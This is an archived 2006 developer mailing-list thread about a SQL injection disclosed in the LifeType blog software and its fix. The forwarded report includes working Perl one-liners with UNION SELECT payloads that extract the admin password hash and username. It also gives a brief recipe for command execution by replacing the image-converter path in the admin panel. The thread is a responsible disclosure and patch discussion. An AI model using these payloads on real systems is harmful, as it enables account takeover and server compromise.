[pLog-svn] Fwd: Security problem
Jon Daley
plogworld at jon.limedaley.com
Mon Jul 3 17:14:22 GMT 2006
I can't duplicate it on 1.0.5 or 1.0.6.
Does someone have time to go through all of the input variables to check
for similar things? I imagine more people are going to be interested in
finding more hacks if we don't.
On Tue, 4 Jul 2006, Mark Wu wrote:
> I just create a 1.0.6 branches and also fixed this sql injection in SVN rev
> 3681.
>
> Can anyone does a quick test to see t fixed or not?
>
> I tested it under my windows environment, it seems fixed.
>
> Mark
>
>> -----Original Message-----
>> From: plog-svn-bounces at devel.lifetype.net
>> [mailto:plog-svn-bounces at devel.lifetype.net] On Behalf Of
>> Oscar Renalias
>> Sent: Monday, July 03, 2006 11:58 PM
>> To: plog-svn at devel.lifetype.net
>> Subject: [pLog-svn] Fwd: Security problem
>>
>> Can somebody quickly investigate this?
>>
>> ---------- Forwarded message ----------
>> From: A. Ramos <aramosf at unsec.net>
>> Date: Jul 3, 2006 5:45 PM
>> Subject: Security problem
>> To: contact at lifetype.net
>>
>>
>> Hello :-)
>>
>> They are one sql injection in latest version of lifetype:
>>
>>
>> To get md5 passwd:
>> perl -MLWP::Simple -e "getprint
>> 'http://localhost/index.php?op=Default&Date=200607\'%20UNION%2
>> 0SELECT%201,password,1,1,1,1,1,1,1,1%20FROM%20lt_users%20WHERE
>> %20id=\'1\'/*&blogId=1'"
>> | perl -ne 'print "password: ".$1."\n" if /articleId=(\w*).*h3/'
>>
>> To get admin username:
>> perl -MLWP::Simple -e "getprint
>> 'http://localhost/index.php?op=Default&Date=200607\'%20UNION%2
>> 0SELECT%201,user,1,1,1,1,1,1,1,1%20FROM%20lt_users%20WHERE%20i
>> d=\'1\'/*&blogId=1'"
>> | perl -ne 'print "admin: ".$1."\n" if /articleId=(\w*).*h3/'
>>
>> And if you can access to the admin control panel, you can run
>> commands in the system changing the value of /usr/bin/convert
>> and put your own command. Upload some picture and wait to
>> resize with the evil command.
>>
>> I think they are more bugs but I havent time to check for more.
>>
>> Thank you.
>>
>> --
>>
>> A. Ramos <aka dab>
>> mailto: <aramosf at unsec.net>
>> http://www.unsec.net
>> _______________________________________________
>> pLog-svn mailing list
>> pLog-svn at devel.lifetype.net
>> http://devel.lifetype.net/mailman/listinfo/plog-svn
>
> _______________________________________________
> pLog-svn mailing list
> pLog-svn at devel.lifetype.net
> http://devel.lifetype.net/mailman/listinfo/plog-svn
>
--
Jon Daley
http://jon.limedaley.com/
Better a meal of vegetables where there is love
than a fattened calf with hatred.
-- Proverbs 15:17
More information about the pLog-svn
mailing list